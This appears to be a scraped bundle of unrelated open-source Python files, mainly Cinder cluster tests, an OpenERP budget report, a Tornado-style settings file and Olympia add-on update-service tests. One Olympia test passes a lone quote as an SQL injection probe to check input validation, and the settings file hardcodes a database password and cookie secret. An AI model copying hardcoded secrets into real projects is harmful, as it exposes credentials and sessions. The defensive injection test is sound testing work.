'stratum': 2,
'reach': 377,
'delay': 0.127,
'poll': 1024,
'max_error': 0.039793,
'est_error': 5.1e-05,
'frequency': -14.24,
'offset': -5.427e-06,
'root_distance': 0.07663,
'root_dispersion': 0.09311
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_fail_gracefully(self, publish_mock):
ntpq_data = Mock(return_value='')
ntpdc_kerninfo_data = Mock(return_value='')
ntpdc_sysinfo_data = Mock(return_value='')
collector_mock = patch.multiple(
NtpdCollector,
get_ntpq_output=ntpq_data,
get_ntpdc_kerninfo_output=ntpdc_kerninfo_data,
get_ntpdc_sysinfo_output=ntpdc_sysinfo_data)
collector_mock.start()
self.collector.collect()
collector_mock.stop()
self.assertPublishedMany(publish_mock, {})
##########################################################################
if __name__ == "__main__":
unittest.main()
|
mit
|
ge0rgi/cinder
|
cinder/tests/unit/objects/test_cluster.py
|
1
|
6662
|
# Copyright (c) 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from oslo_utils import timeutils
from cinder import objects
from cinder.tests.unit import fake_cluster
from cinder.tests.unit import objects as test_objects
from cinder import utils
def _get_filters_sentinel():
return {'session': mock.sentinel.session,
'name_match_level': mock.sentinel.name_match_level,
'read_deleted': mock.sentinel.read_deleted,
'get_services': mock.sentinel.get_services,
'services_summary': mock.sentinel.services_summary,
'name': mock.sentinel.name,
'binary': mock.sentinel.binary,
'is_up': mock.sentinel.is_up,
'disabled': mock.sentinel.disabled,
'disabled_reason': mock.sentinel.disabled_reason,
'race_preventer': mock.sentinel.race_preventer,
'last_heartbeat': mock.sentinel.last_heartbeat,
'num_hosts': mock.sentinel.num_hosts,
            'num_down_hosts': mock.sentinel.num_down_hosts}
@ddt.ddt
class TestCluster(test_objects.BaseObjectsTestCase):
"""Test Cluster Versioned Object methods."""
cluster = fake_cluster.fake_cluster_orm()
@mock.patch('cinder.db.sqlalchemy.api.cluster_get', return_value=cluster)
def test_get_by_id(self, cluster_get_mock):
filters = _get_filters_sentinel()
cluster = objects.Cluster.get_by_id(self.context,
mock.sentinel.cluster_id,
**filters)
self.assertIsInstance(cluster, objects.Cluster)
self._compare(self, self.cluster, cluster)
cluster_get_mock.assert_called_once_with(self.context,
mock.sentinel.cluster_id,
**filters)
@mock.patch('cinder.db.sqlalchemy.api.cluster_create',
return_value=cluster)
def test_create(self, cluster_create_mock):
cluster = objects.Cluster(context=self.context, name='cluster_name')
cluster.create()
self.assertEqual(self.cluster.id, cluster.id)
cluster_create_mock.assert_called_once_with(self.context,
{'name': 'cluster_name'})
@mock.patch('cinder.db.sqlalchemy.api.cluster_update',
return_value=cluster)
def test_save(self, cluster_update_mock):
cluster = fake_cluster.fake_cluster_ovo(self.context)
cluster.disabled = True
cluster.save()
cluster_update_mock.assert_called_once_with(self.context, cluster.id,
{'disabled': True})
@mock.patch('cinder.db.sqlalchemy.api.cluster_destroy')
def test_destroy(self, cluster_destroy_mock):
cluster = fake_cluster.fake_cluster_ovo(self.context)
cluster.destroy()
cluster_destroy_mock.assert_called_once_with(mock.ANY, cluster.id)
@mock.patch('cinder.db.sqlalchemy.api.cluster_get', return_value=cluster)
def test_refresh(self, cluster_get_mock):
cluster = fake_cluster.fake_cluster_ovo(self.context)
cluster.refresh()
cluster_get_mock.assert_called_once_with(self.context, cluster.id)
def test_is_up_no_last_hearbeat(self):
cluster = fake_cluster.fake_cluster_ovo(self.context,
last_heartbeat=None)
self.assertFalse(cluster.is_up)
def test_is_up(self):
cluster = fake_cluster.fake_cluster_ovo(
self.context,
last_heartbeat=timeutils.utcnow(with_timezone=True))
self.assertTrue(cluster.is_up)
def test_is_up_limit(self):
limit_expired = (utils.service_expired_time(True) +
timeutils.datetime.timedelta(seconds=1))
cluster = fake_cluster.fake_cluster_ovo(self.context,
last_heartbeat=limit_expired)
self.assertTrue(cluster.is_up)
def test_is_up_down(self):
expired_time = (utils.service_expired_time(True) -
timeutils.datetime.timedelta(seconds=1))
cluster = fake_cluster.fake_cluster_ovo(self.context,
last_heartbeat=expired_time)
self.assertFalse(cluster.is_up)
@ddt.data('1.0', '1.1')
def tests_obj_make_compatible(self, version):
new_fields = {'replication_status': 'error', 'frozen': True,
'active_backend_id': 'replication'}
cluster = objects.Cluster(self.context, **new_fields)
primitive = cluster.obj_to_primitive(version)
converted_cluster = objects.Cluster.obj_from_primitive(primitive)
for key, value in new_fields.items():
if version == '1.0':
self.assertFalse(converted_cluster.obj_attr_is_set(key))
else:
self.assertEqual(value, getattr(converted_cluster, key))
class TestClusterList(test_objects.BaseObjectsTestCase):
"""Test ClusterList Versioned Object methods."""
@mock.patch('cinder.db.sqlalchemy.api.cluster_get_all')
def test_cluster_get_all(self, cluster_get_all_mock):
orm_values = [
fake_cluster.fake_cluster_orm(),
fake_cluster.fake_cluster_orm(id=2, name='cluster_name2'),
]
cluster_get_all_mock.return_value = orm_values
filters = _get_filters_sentinel()
result = objects.ClusterList.get_all(self.context, **filters)
cluster_get_all_mock.assert_called_once_with(
self.context, filters.pop('is_up'), filters.pop('get_services'),
filters.pop('services_summary'), filters.pop('read_deleted'),
filters.pop('name_match_level'), **filters)
self.assertEqual(2, len(result))
for i in range(len(result)):
self.assertIsInstance(result[i], objects.Cluster)
self._compare(self, orm_values[i], result[i])
|
apache-2.0
|
qbeenslee/Nepenthes-Server
|
config/setting.py
|
1
|
1657
|
# coding:utf-8
'''
Settings
Author : qbeenslee
Created : 2014/10/9
'''
import os
# Whether to enable debug/testing mode
DEBUG = False
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
# Database settings
# if DEBUG:
# DB_CONFIG = {
# "host": '127.0.0.1',
# "db": 'nepenthes',
# "port": '3140',
# "user": 'test',
# "password": 'abcd',
# }
# else:
# import sae.const
#
# DB_CONFIG = {
# "host": sae.const.MYSQL_HOST,
# "db": sae.const.MYSQL_DB,
# "port": sae.const.MYSQL_PORT,
# "user": sae.const.MYSQL_USER,
# "password": sae.const.MYSQL_PASS,
# }
DB_CONFIG = {
"host": '127.0.0.1',
"db": 'nepenthes',
"port": '3306',
"user": 'test',
"password": 'abcdef',
}
# Database connection string
DB_CONNECT_STRING = 'mysql://' + DB_CONFIG['user'] + ':' + DB_CONFIG['password'] + '@' + DB_CONFIG['host'] + ':' + \
DB_CONFIG['port'] + '/' + DB_CONFIG['db'] + '?charset=utf8'
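# With the DB_CONFIG above this evaluates to:
# 'mysql://test:abcdef@127.0.0.1:3306/nepenthes?charset=utf8'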
settings = {
'cookie_secret': 'WJyZi+hkyLTMS0X3yVHn6SzaFrY0jscNRCN6aXBIUaTCZhC',
'debug': DEBUG,
'static_path': os.path.join(BASE_PATH, 'static'),
}
# Maximum password retry attempts
PWD_ERROR_TIME = 10
# Password validity period (unit: seconds; default: 7 days)
PWD_HOLD_TIME_DEFAULT = 604800.0
PWD_HOLD_TIME_SHORT = 36000.0
# Range for the password hash iteration count
PWD_ITERATION_INTERVAL = {'MIN': 11, 'MAX': 99}
# Outgoing email account settings
OFFICE_EMAIL_COUNT = r'****'
OFFICE_EMAIL_SMTPSERVER = r'****'
OFFICE_EMAIL_NAME_TITLE = r'****'
OFFICE_EMAIL_PASSWORD = r'****'
UPLOAD_PATH = os.path.join(BASE_PATH, 'static/upload/')
if __name__ == '__main__':
print BASE_PATH
print UPLOAD_PATH
|
gpl-3.0
|
legalsylvain/OpenUpgrade
|
addons/account_budget/report/crossovered_budget_report.py
|
63
|
8603
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
class budget_report(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(budget_report, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'funct': self.funct,
'funct_total': self.funct_total,
'time': time,
})
self.context = context
def funct(self, object, form, ids=None, done=None, level=1):
if ids is None:
ids = {}
if not ids:
ids = self.ids
if not done:
done = {}
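# 'tot' is a module-level global shared with funct_total() below, which
# renders the report's grand totals.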
global tot
tot = {
'theo':0.00,
'pln':0.00,
'prac':0.00,
'perc':0.00
}
result = []
budgets = self.pool.get('crossovered.budget').browse(self.cr, self.uid, [object.id], self.context.copy())
c_b_lines_obj = self.pool.get('crossovered.budget.lines')
acc_analytic_obj = self.pool.get('account.analytic.account')
for budget_id in budgets:
res = {}
budget_lines = []
budget_ids = []
d_from = form['date_from']
d_to = form['date_to']
for line in budget_id.crossovered_budget_line:
budget_ids.append(line.id)
if not budget_ids:
return []
self.cr.execute('SELECT DISTINCT(analytic_account_id) FROM crossovered_budget_lines WHERE id = ANY(%s)',(budget_ids,))
an_ids = self.cr.fetchall()
context = {'wizard_date_from': d_from, 'wizard_date_to': d_to}
for i in range(0, len(an_ids)):
if not an_ids[i][0]:
continue
analytic_name = acc_analytic_obj.browse(self.cr, self.uid, [an_ids[i][0]])
res={
'b_id': '-1',
'a_id': '-1',
'name': analytic_name[0].name,
'status': 1,
'theo': 0.00,
'pln': 0.00,
'prac': 0.00,
'perc': 0.00
}
result.append(res)
line_ids = c_b_lines_obj.search(self.cr, self.uid, [('id', 'in', budget_ids), ('analytic_account_id','=',an_ids[i][0])])
line_id = c_b_lines_obj.browse(self.cr, self.uid, line_ids)
tot_theo = tot_pln = tot_prac = tot_perc = 0.00
done_budget = []
for line in line_id:
if line.id in budget_ids:
theo = pract = 0.00
theo = c_b_lines_obj._theo_amt(self.cr, self.uid, [line.id], context)[line.id]
pract = c_b_lines_obj._prac_amt(self.cr, self.uid, [line.id], context)[line.id]
if line.general_budget_id.id in done_budget:
for record in result:
if record['b_id'] == line.general_budget_id.id and record['a_id'] == line.analytic_account_id.id:
record['theo'] += theo
record['pln'] += line.planned_amount
record['prac'] += pract
if record['theo'] != 0.00:
perc = (record['prac'] / record['theo']) * 100
else:
perc = 0.00
record['perc'] = perc
tot_theo += theo
tot_pln += line.planned_amount
tot_prac += pract
tot_perc += perc
else:
if theo != 0.00:
perc = (pract / theo) * 100
else:
perc = 0.00
res1 = {
'a_id': line.analytic_account_id.id,
'b_id': line.general_budget_id.id,
'name': line.general_budget_id.name,
'status': 2,
'theo': theo,
'pln': line.planned_amount,
'prac': pract,
'perc': perc,
}
tot_theo += theo
tot_pln += line.planned_amount
tot_prac += pract
tot_perc += perc
if form['report'] == 'analytic-full':
result.append(res1)
done_budget.append(line.general_budget_id.id)
else:
if line.general_budget_id.id in done_budget:
continue
else:
res1={
'a_id': line.analytic_account_id.id,
'b_id': line.general_budget_id.id,
'name': line.general_budget_id.name,
'status': 2,
'theo': 0.00,
'pln': 0.00,
'prac': 0.00,
'perc': 0.00
}
if form['report'] == 'analytic-full':
result.append(res1)
done_budget.append(line.general_budget_id.id)
if tot_theo == 0.00:
tot_perc = 0.00
else:
tot_perc = float(tot_prac / tot_theo) * 100
if form['report'] == 'analytic-full':
result[-(len(done_budget) +1)]['theo'] = tot_theo
tot['theo'] += tot_theo
result[-(len(done_budget) +1)]['pln'] = tot_pln
tot['pln'] += tot_pln
result[-(len(done_budget) +1)]['prac'] = tot_prac
tot['prac'] += tot_prac
result[-(len(done_budget) +1)]['perc'] = tot_perc
else:
result[-1]['theo'] = tot_theo
tot['theo'] += tot_theo
result[-1]['pln'] = tot_pln
tot['pln'] += tot_pln
result[-1]['prac'] = tot_prac
tot['prac'] += tot_prac
result[-1]['perc'] = tot_perc
if tot['theo'] == 0.00:
tot['perc'] = 0.00
else:
tot['perc'] = float(tot['prac'] / tot['theo']) * 100
return result
def funct_total(self, form):
result = []
res = {}
res = {
'tot_theo': tot['theo'],
'tot_pln': tot['pln'],
'tot_prac': tot['prac'],
'tot_perc': tot['perc']
}
result.append(res)
return result
class report_crossoveredbudget(osv.AbstractModel):
_name = 'report.account_budget.report_crossoveredbudget'
_inherit = 'report.abstract_report'
_template = 'account_budget.report_crossoveredbudget'
_wrapped_report_class = budget_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
koehlermichael/olympia
|
apps/addons/tests/test_update.py
|
14
|
31922
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from email import utils
from django.db import connection
from nose.tools import eq_
import amo
import amo.tests
from addons.models import (Addon, CompatOverride, CompatOverrideRange,
IncompatibleVersions)
from applications.models import AppVersion
from files.models import File
from services import update
from versions.models import ApplicationsVersions, Version
class VersionCheckMixin(object):
def get(self, data):
up = update.Update(data)
up.cursor = connection.cursor()
return up
class TestDataValidate(VersionCheckMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/appversion']
def setUp(self):
super(TestDataValidate, self).setUp()
self.good_data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
def test_app_os(self):
data = self.good_data.copy()
data['appOS'] = 'something %s penguin' % amo.PLATFORM_LINUX.api_name
form = self.get(data)
assert form.is_valid()
eq_(form.data['appOS'], amo.PLATFORM_LINUX.id)
def test_app_version_fails(self):
data = self.good_data.copy()
del data['appID']
form = self.get(data)
assert not form.is_valid()
def test_app_version_wrong(self):
data = self.good_data.copy()
data['appVersion'] = '67.7'
form = self.get(data)
# Passing through the wrong version is fine; you will just
# end up with no updates because your version_int will be
# out of range.
assert form.is_valid()
def test_app_version(self):
data = self.good_data.copy()
form = self.get(data)
assert form.is_valid()
eq_(form.data['version_int'], 3070000001000)
def test_sql_injection(self):
data = self.good_data.copy()
data['id'] = "'"
up = self.get(data)
assert not up.is_valid()
def test_inactive(self):
addon = Addon.objects.get(pk=3615)
addon.update(disabled_by_user=True)
up = self.get(self.good_data)
assert not up.is_valid()
def test_soft_deleted(self):
addon = Addon.objects.get(pk=3615)
addon.update(status=amo.STATUS_DELETED)
up = self.get(self.good_data)
assert not up.is_valid()
def test_no_version(self):
data = self.good_data.copy()
del data['version']
up = self.get(data)
assert up.is_valid()
def test_unlisted_addon(self):
"""Don't provide updates for unlisted addons."""
addon = Addon.objects.get(pk=3615)
addon.update(is_listed=False)
up = self.get(self.good_data)
assert not up.is_valid()
class TestLookup(VersionCheckMixin, amo.tests.TestCase):
fixtures = ['addons/update', 'base/appversion']
def setUp(self):
super(TestLookup, self).setUp()
self.addon = Addon.objects.get(id=1865)
self.platform = None
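# 3069900200100 is the packed integer form of Firefox 3.0.12 (see
# test_new_client below).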
self.version_int = 3069900200100
self.app = amo.APP_IDS[1]
self.version_1_0_2 = 66463
self.version_1_1_3 = 90149
self.version_1_2_0 = 105387
self.version_1_2_1 = 112396
self.version_1_2_2 = 115509
def get(self, *args):
data = {
'id': self.addon.guid,
'appID': args[2].guid,
'appVersion': 1, # this is going to be overridden
'appOS': args[3].api_name if args[3] else '',
'reqVersion': '',
}
# Allow version to be optional.
if args[0]:
data['version'] = args[0]
up = super(TestLookup, self).get(data)
assert up.is_valid()
up.data['version_int'] = args[1]
up.get_update()
return (up.data['row'].get('version_id'),
up.data['row'].get('file_id'))
def change_status(self, version, status):
version = Version.objects.get(pk=version)
file = version.files.all()[0]
file.status = status
file.save()
return version
def change_version(self, version, name):
Version.objects.get(pk=version).update(version=name)
def test_low_client(self):
"""
Version 3.0a1 of Firefox is 3000000001100 and version 1.0.2 of the
add-on is returned.
"""
version, file = self.get('', '3000000001100',
self.app, self.platform)
eq_(version, self.version_1_0_2)
def test_new_client(self):
"""
Version 3.0.12 of Firefox is 3069900200100 and version 1.2.2 of the
add-on is returned.
"""
version, file = self.get('', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_2)
def test_min_client(self):
"""
Version 3.7a5pre of Firefox is 3070000005000 and version 1.1.3 of
the add-on is returned, because all later ones are set to minimum
version of 3.7a5.
"""
for version in Version.objects.filter(pk__gte=self.version_1_2_0):
appversion = version.apps.all()[0]
appversion.min = AppVersion.objects.get(pk=325) # 3.7a5
appversion.save()
version, file = self.get('', '3070000005000', # 3.7a5pre
self.app, self.platform)
eq_(version, self.version_1_1_3)
def test_new_client_ordering(self):
"""
Given the following:
* Version 15 (1 day old), max application_version 3.6*
* Version 12 (1 month old), max application_version 3.7a
We want version 15, even though version 12 is for a higher version.
This was found in https://bugzilla.mozilla.org/show_bug.cgi?id=615641.
"""
application_version = ApplicationsVersions.objects.get(pk=77550)
application_version.max_id = 350
application_version.save()
# Version 1.2.2 is now a lower max version.
application_version = ApplicationsVersions.objects.get(pk=88490)
application_version.max_id = 329
application_version.save()
version, file = self.get('', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_2)
def test_public_not_beta(self):
"""
If the addon status is public and you are not asking
for a beta version, then you get a public version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
eq_(self.addon.status, amo.STATUS_PUBLIC)
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_public_beta(self):
"""
If the addon status is public, you are in beta and the file is
beta, then you get a beta.
"""
self.change_version(self.version_1_2_0, '1.2beta')
self.change_status(self.version_1_2_0, amo.STATUS_BETA)
self.change_status(self.version_1_2_1, amo.STATUS_BETA)
version, file = self.get('1.2beta', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_can_downgrade(self):
"""
Check that we can downgrade, if 1.2.0 gets admin disabled
and the oldest public version is now 1.1.3.
"""
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
for v in Version.objects.filter(pk__gte=self.version_1_2_1):
v.delete()
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_1_3)
def test_public_pending_exists(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. In this case, because the
file is pending, we are looking for something public.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
self.change_version(self.version_1_2_0, '1.2beta')
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_public_pending_no_file_beta(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. If there are no files,
find a public version.
"""
self.change_version(self.version_1_2_0, '1.2beta')
Version.objects.get(pk=self.version_1_2_0).files.all().delete()
version, file = self.get('1.2beta', self.version_int,
self.app, self.platform)
dest = Version.objects.get(pk=self.version_1_2_2)
eq_(dest.addon.status, amo.STATUS_PUBLIC)
eq_(dest.files.all()[0].status, amo.STATUS_PUBLIC)
eq_(version, dest.pk)
def test_public_pending_not_exists(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. In this case, because the
file is pending, we are looking for a public version.
"""
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
self.change_version(self.version_1_2_0, '1.2beta')
self.change_status(self.version_1_2_2, amo.STATUS_BETA)
version, file = self.get('1.2beta', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_not_public(self):
"""
If the addon status is not public, then the update only
looks for files within that one version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_NULL)
self.addon.update(status=amo.STATUS_NULL)
version, file = self.get('1.2.1', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_platform_does_not_exist(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_platform_exists(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_2)
def test_file_for_platform(self):
"""If client passes a platform, make sure we get the right file."""
version = Version.objects.get(pk=self.version_1_2_2)
file_one = version.files.all()[0]
file_one.platform = amo.PLATFORM_LINUX.id
file_one.save()
file_two = File(version=version, filename='foo', hash='bar',
platform=amo.PLATFORM_WIN.id,
status=amo.STATUS_PUBLIC)
file_two.save()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_2)
eq_(file, file_one.pk)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_WIN)
eq_(version, self.version_1_2_2)
eq_(file, file_two.pk)
def test_file_preliminary(self):
"""
If there's a newer file in prelim. review, it won't show up. This is
a test for https://bugzilla.mozilla.org/show_bug.cgi?id=620749
"""
version = Version.objects.get(pk=self.version_1_2_2)
file = version.files.all()[0]
file.status = amo.STATUS_LITE
file.save()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
def test_file_preliminary_addon(self):
"""
If the addon is in prelim. review, show the highest file with
prelim, which in this case is 1.2.1
"""
for status in amo.LITE_STATUSES:
self.addon.update(status=status)
# Since we're asking for an update from version 1.2, and
# we want to serve a prelim update, 1.2 needs to be
# prelim as well.
self.change_status(self.version_1_2_0, amo.STATUS_LITE)
self.change_status(self.version_1_2_1, amo.STATUS_LITE)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
def test_file_preliminary_odd_statuses(self):
"""
Test that we serve prelim updates even when current version is
disabled or deleted.
"""
self.addon.update(status=amo.STATUS_LITE)
self.change_status(self.version_1_2_1, amo.STATUS_LITE)
# Current version disabled.
self.change_status(self.version_1_2_0, amo.STATUS_DISABLED)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
# Current version deleted.
Version.objects.get(pk=self.version_1_2_0).delete()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
def test_file_preliminary_ex_full_addon(self):
"""
If the addon is in prelim. review, user has a full reviewed version.
Show the most recent full reviewed version.
"""
self.addon.update(status=amo.STATUS_LITE)
self.change_status(self.version_1_2_2, amo.STATUS_LITE)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
class TestDefaultToCompat(VersionCheckMixin, amo.tests.TestCase):
"""
Test default to compatible with all the various combinations of input.
"""
fixtures = ['addons/default-to-compat']
def setUp(self):
super(TestDefaultToCompat, self).setUp()
self.addon = Addon.objects.get(id=337203)
self.platform = None
self.app = amo.APP_IDS[1]
self.app_version_int_3_0 = 3000000200100
self.app_version_int_4_0 = 4000000200100
self.app_version_int_5_0 = 5000000200100
self.app_version_int_6_0 = 6000000200100
self.app_version_int_7_0 = 7000000200100
self.app_version_int_8_0 = 8000000200100
self.ver_1_0 = 1268881
self.ver_1_1 = 1268882
self.ver_1_2 = 1268883
self.ver_1_3 = 1268884
self.expected = {
'3.0-strict': None, '3.0-normal': None, '3.0-ignore': None,
'4.0-strict': self.ver_1_0,
'4.0-normal': self.ver_1_0,
'4.0-ignore': self.ver_1_0,
'5.0-strict': self.ver_1_2,
'5.0-normal': self.ver_1_2,
'5.0-ignore': self.ver_1_2,
'6.0-strict': self.ver_1_3,
'6.0-normal': self.ver_1_3,
'6.0-ignore': self.ver_1_3,
'7.0-strict': self.ver_1_3,
'7.0-normal': self.ver_1_3,
'7.0-ignore': self.ver_1_3,
'8.0-strict': None,
'8.0-normal': self.ver_1_3,
'8.0-ignore': self.ver_1_3,
}
def create_override(self, **kw):
co = CompatOverride.objects.create(
name='test', guid=self.addon.guid, addon=self.addon
)
default = dict(compat=co, app=self.app.id, min_version='0',
max_version='*', min_app_version='0',
max_app_version='*')
default.update(kw)
CompatOverrideRange.objects.create(**default)
def update_files(self, **kw):
for version in self.addon.versions.all():
for file in version.files.all():
file.update(**kw)
def get(self, **kw):
up = super(TestDefaultToCompat, self).get({
'reqVersion': 1,
'id': self.addon.guid,
'version': kw.get('item_version', '1.0'),
'appID': self.app.guid,
'appVersion': kw.get('app_version', '3.0'),
})
assert up.is_valid()
up.compat_mode = kw.get('compat_mode', 'strict')
up.get_update()
return up.data['row'].get('version_id')
def check(self, expected):
"""
Checks Firefox versions 3.0 to 8.0 in each compat mode and compares it
to the expected version.
"""
versions = ['3.0', '4.0', '5.0', '6.0', '7.0', '8.0']
modes = ['strict', 'normal', 'ignore']
for version in versions:
for mode in modes:
eq_(self.get(app_version=version, compat_mode=mode),
expected['-'.join([version, mode])],
'Unexpected version for "%s-%s"' % (version, mode))
def test_baseline(self):
# Tests simple add-on (non-binary-components, non-strict).
self.check(self.expected)
def test_binary_components(self):
# Tests add-on with binary_components flag.
self.update_files(binary_components=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_extension_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
def test_binary_component_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.update_files(binary_components=True)
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': None,
})
self.check(self.expected)
def test_strict_opt_in(self):
# Tests add-on with opt-in strict compatibility
self.update_files(strict_compatibility=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_max_addon_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a max wildcard.
self.create_override(min_version='1.2', max_version='1.3',
min_app_version='5.0', max_app_version='6.*')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_max_app_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a min/max wildcard for the app.
self.create_override(min_version='1.2', max_version='1.3')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
'7.0-normal': self.ver_1_1,
'8.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_both_wildcards(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a wildcard for both addon version and app
# version.
self.create_override(min_app_version='7.0', max_app_version='*')
self.expected.update({
'7.0-normal': None,
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_invalid_version(self):
# Tests compat override range where version doesn't match our
# versioning scheme. This results in no versions being written to the
# incompatible_versions table.
self.create_override(min_version='ver1', max_version='ver2')
eq_(IncompatibleVersions.objects.all().count(), 0)
def test_min_max_version(self):
# Tests the minimum requirement of the app maxVersion.
av = self.addon.current_version.apps.all()[0]
av.min_id = 233 # Firefox 3.0.
av.max_id = 268 # Firefox 3.5.
av.save()
self.expected.update({
'3.0-strict': self.ver_1_3,
'3.0-ignore': self.ver_1_3,
'4.0-ignore': self.ver_1_3,
'5.0-ignore': self.ver_1_3,
'6.0-strict': self.ver_1_2,
'6.0-normal': self.ver_1_2,
'7.0-strict': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
class TestResponse(VersionCheckMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/seamonkey']
def setUp(self):
super(TestResponse, self).setUp()
self.addon_one = Addon.objects.get(pk=3615)
self.good_data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
self.mac = amo.PLATFORM_MAC
self.win = amo.PLATFORM_WIN
def test_bad_guid(self):
data = self.good_data.copy()
data["id"] = "garbage"
up = self.get(data)
eq_(up.get_rdf(), up.get_bad_rdf())
def test_no_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
data = self.good_data.copy()
data["appOS"] = self.win.api_name
up = self.get(data)
assert up.get_rdf()
eq_(up.data['row']['file_id'], file.pk)
data["appOS"] = self.mac.api_name
up = self.get(data)
eq_(up.get_rdf(), up.get_no_updates_rdf())
def test_different_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
file_pk = file.pk
file.id = None
file.platform = self.mac.id
file.save()
mac_file_pk = file.pk
data = self.good_data.copy()
data['appOS'] = self.win.api_name
up = self.get(data)
up.is_valid()
up.get_update()
eq_(up.data['row']['file_id'], file_pk)
data['appOS'] = self.mac.api_name
up = self.get(data)
up.is_valid()
up.get_update()
eq_(up.data['row']['file_id'], mac_file_pk)
def test_good_version(self):
up = self.get(self.good_data)
up.is_valid()
up.get_update()
assert up.data['row']['hash'].startswith('sha256:3808b13e')
